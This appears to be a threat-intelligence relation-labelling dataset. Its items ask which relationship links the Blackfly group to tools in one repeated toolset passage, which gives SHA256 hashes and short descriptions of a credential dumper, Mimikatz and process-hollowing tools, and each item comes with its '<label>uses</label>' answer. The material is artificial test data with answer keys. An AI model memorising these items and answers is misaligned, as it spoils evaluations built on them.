Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>uses</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Blackfly
### Target Entity: Credential-dumping tool
### Possible Relationship Labels:
['uses', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>uses</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Blackfly
### Target Entity: Screenshotting tool
### Possible Relationship Labels:
['uses', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>uses</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Blackfly
### Target Entity: Process-hollowing tool
### Possible Relationship Labels:
['uses', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>uses</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Blackfly
### Target Entity: SQL tool
### Possible Relationship Labels:
['uses', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>uses</label>
|
You are a helpful threat intelligence analyst. Your task is to identify the label of the relationship between the source entity and the target entity in the provided text passage. To help you, we provide all the possible relationship labels between the source and target entities.
Answer in the following format: <label>Your chosen label</label>
|
### Source Entity:
Blackfly
### Target Entity: Mimikatz
### Possible Relationship Labels:
['uses', 'is not related to', 'not sure']
### Text Passage:
Current Blackfly toolset
The following tools were used in attacks during late 2022 and early 2023:
* **Backdoor.Winnkit**
SHA256: caba1085791d13172b1bb5aca25616010349ecce17564a00cb1d89c7158d6459
SHA256: cf6bcd3a62720f0e26e1880fe7ac9ca6c62f7f05f1f68b8fe59a4eb47377880a
SHA256: e1e0b887b68307ed192d393e886d8b982e4a2fd232ee13c2f20cd05f91358596
SHA256: a3078d0c4c564f5efb1460e7d341981282f637d38048501221125756bc740aac
SHA256: 714cef77c92b1d909972580ec7602b0914f30e32c09a5e8cb9cb4d32aa2a2196
SHA256: 192ef0dee8df73eec9ee617abe4b0104799f9543a22a41e28d4d44c3ad713284
Rootkit driver known to be associated with Blackfly
* **Credential-dumping tool**
SHA256: 100cad54c1f54126b9d37eb8c9e426cb609fc0eda0e9a241c2c9fd5a3a01ad6c
Creates a dump of credentials from lsass.exe in C:\windows\temp\1.bin.
* **Screenshotting tool**
SHA256: 452d08d420a8d564ff5df6f6a91521887f8b9141d96c77a423ac7fc9c28e07e4
Screenshots all open windows and saves them as .jpg files.
* **Process-hollowing tool**
SHA256: 1cc838896fbaf7c1996198309fbf273c058b796cd2ac1ba7a46bee6df606900e
Injects shellcode in C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted. The shellcode is a simple "Hello World" alert message.
* **SQL tool**
SHA256: 4ae2cb9454077300151e701e6ac4e4d26dc72227135651e02437902ac05aa80d
SQL client tool used to query SQL databases.
* **Mimikatz**
SHA256: b28456a0252f4cd308dfb84eeaa14b713d86ba30c4b9ca8d87ba3e592fd27f1c
Publicly available credential-dumping tool.
* **ForkPlayground**
SHA256: a3acb9f79647f813671c1a21097a51836b0b95397ebc9cd178bc806e1773c864
Proof-of-Concept application to create a memory dump of an arbitrary process using the ForkLib.
* **Proxy configuration tool**
SHA256: 5e51bdf067e5781d2868d97e7608187d2fec423856dbc883c6f81a9746e99b9f
SHA256: d4e1f09cb7b9b03b4779c87f2a10d379f1dd010a9686d221c3a9f45bda5655ee
SHA256: f138d785d494b8ff12d4a57db94958131f61c76d5d2c4d387b343a213b29d18f
Configures proxy settings by injecting into: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted.
* **Proxy configuration tool**
SHA256: 88113bebc49d40c0aa1f1f0b10a7e6e71e4ed3ae595362451bd9dcebcf7f8bf4
SHA256: 498e8d231f97c037909662764397e02f67d0ee16b4f6744cf923f4de3b522bc1
This tool requires a file called conf.dat to run properly, located at: c:\users\public\conf.dat. Conf.dat contains the configuration to set up proxy settings.
|
<label>uses</label>
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.